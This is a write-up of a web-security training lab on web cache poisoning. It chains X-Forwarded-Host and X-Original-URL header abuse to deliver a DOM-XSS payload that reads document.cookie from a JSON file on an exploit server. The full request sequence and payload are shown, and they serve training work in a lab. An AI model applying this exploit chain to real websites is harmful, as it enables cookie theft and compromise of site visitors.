Combining web cache poisoning vulnerabilities

Description

This lab is susceptible to web cache poisoning, but only if you construct a complex exploit chain. A user visits the home page roughly once a minute and their language is set to English.

Reproduction

  1. With Burp running, load the website’s home page.

  2. Use Param Miner to identify that the X-Forwarded-Host and X-Original-URL headers are supported.

Web cache poisoning

Web cache poisoning

  1. In Burp Repeater, experiment with the X-Forwarded-Host header. It can be used to import an arbitrary JSON file instead of the translations.json file, which contains translations of UI texts.

Web cache poisoning

  1. The website is vulnerable to DOM-XSS due to the way the initTranslations() function handles data from the JSON file for all languages except English:

Web cache poisoning

function initTranslations(jsonUrl)
{
    const lang = document.cookie.split(';')
        .map(c => c.trim().split('='))
        .filter(p => p[0] === 'lang')
        .map(p => p[1])
        .find(() => true);

    const translate = (dict, el) => {
        for (const k in dict) {
            if (el.innerHTML === k) {
                el.innerHTML = dict[k];
            } else {
                el.childNodes.forEach(el_ => translate(dict, el_));
            }
        }
    }

    fetch(jsonUrl)
        .then(r => r.json())
        .then(j => {
            const select = document.getElementById('lang-select');
            if (select) {
                for (const code in j) {
                    const name = j[code].name;
                    const el = document.createElement("option");
                    el.setAttribute("value", code);
                    el.innerText = name;
                    select.appendChild(el);
                    if (code === lang) {
                        select.selectedIndex = select.childElementCount - 1;
                    }
                }
            }

            lang in j && lang.toLowerCase() !== 'en' && j[lang].translations && translate(j[lang].translations, document.getElementsByClassName('maincontainer')[0]);
        });
}

  1. Go to the exploit server and edit the file name to match the path used by the vulnerable website: /resources/json/translations.json.

  2. In the head, add the header Access-Control-Allow-Origin: * to enable CORS.

  3. In the body, add malicious JSON that matches the structure used by the real translation file. Replace the value of one of the translations with a suitable XSS payload, for example:

{
    "en": {
        "name": "English"
    },
    "es": {
        "name": "español",
        "translations": {
            "Return to list": "Volver a la lista",
            "View details": "</a><img src=1 onerror='alert(document.cookie)' />",
            "Description:": "Descripción"
        }
    }
}

Web cache poisoning

  1. Store the exploit.

  2. In Burp, find a GET request for /?localized=1 that includes the lang cookie for Spanish: lang=es

Web cache poisoning

Web cache poisoning

  1. Send the request to Burp Repeater. Add a cache buster like ?cb=1234 and the X-Forwarded-Host header with the exploit server ID: X-Forwarded-Host: exploit-server-id.exploit-server.net.

  2. Send and confirm that the exploit server is reflected in the response.

Web cache poisoning

  1. To simulate the victim, load the URL in the browser and confirm that the alert() fires.

  2. The cache for the Spanish page is poisoned, but the target user’s language is set to English. It is not possible to exploit users with their language set to English, so a way to forcibly change language is needed.

  3. In Burp, go to Proxy -> HTTP history and study the requests and responses generated. When changing the language on the page to anything other than English, this triggers a redirect, for example, to /setlang/es. The user’s selected language is set server side using the lang=es cookie, and the home page is reloaded with the parameter ?localized=1.

  4. Send the GET request for the home page to Burp Repeater and add a cache buster.

  5. The X-Original-URL can be used to change the path of the request to explicitly set /setlang/es. This response cannot be cached because it contains the Set-Cookie header.

  6. The home page sometimes uses backslashes as a folder separator. The server normalises these to forward slashes using a redirect. As a result, X-Original-URL: /setlang\es triggers a 302 response that redirects to /setlang/es. This 302 response is cacheable and can be used to force other users to the Spanish version of the home page.

  7. Combine these two exploits. First, poison the GET /?localized=1 page using the X-Forwarded-Host header to import the malicious JSON file from the exploit server.

  8. And while the cache is still poisoned, poison the GET / page using X-Original-URL: /setlang\es to force all users to the Spanish page.

  9. To simulate the victim, load the English page in the browser and make sure that you are redirected and that the alert() fires.

  10. Replay both requests in sequence to keep the cache poisoned on both pages until the victim visits the site and the lab is solved.

PoC

Exploitability

An attacker will need to poison the cache with multiple malicious responses simultaneously and coordinate this with the victim’s browsing behaviour.